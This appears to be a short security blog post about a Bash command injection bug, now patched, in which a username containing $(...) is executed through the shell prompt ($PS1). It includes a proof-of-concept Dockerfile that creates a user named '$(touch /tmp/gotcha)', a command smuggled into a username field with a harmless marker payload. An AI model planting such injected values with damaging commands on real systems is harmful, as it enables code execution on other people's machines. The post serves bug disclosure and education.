If you create a user named $(some_command), and then start Bash as that user, some_command gets run.
In the fall of 2024, command injection was on my mind. I had just heard Aaron Portnoy give a lecture on CVE-2023-1389, and had recently played with this fun command injection bug. I wondered: if I start cramming $s all over the place, how long will it take before I find some poor shell script that didn't account for evil usernames?
So my friend Jonah and I decided to start by sticking "$(touch /tmp/gotcha)" in a Linux username, and then just run a bunch of commands until /tmp/gotcha showed up in the filesystem. Immediately after logging into the new account, /tmp/gotcha was created. Further, we noticed that the username in the shell prompty was empty. A little bit of investigation revealed that the $PS1 was the source of the command injection.
Another friend, Malcolm, wrote up a patch and submitted it to the Bash bug tracker, so this is now fixed.
FROM debian:12 RUN useradd --badname '$(touch /tmp/gotcha)' USER $(touch /tmp/gotcha)Then run the image and ls /tmp :)
Probably not! But it is kind of cool :)
Malcolm covered this bug in a lot more depth in a post of his own. Check it out if you're interested in going more in-depth on this.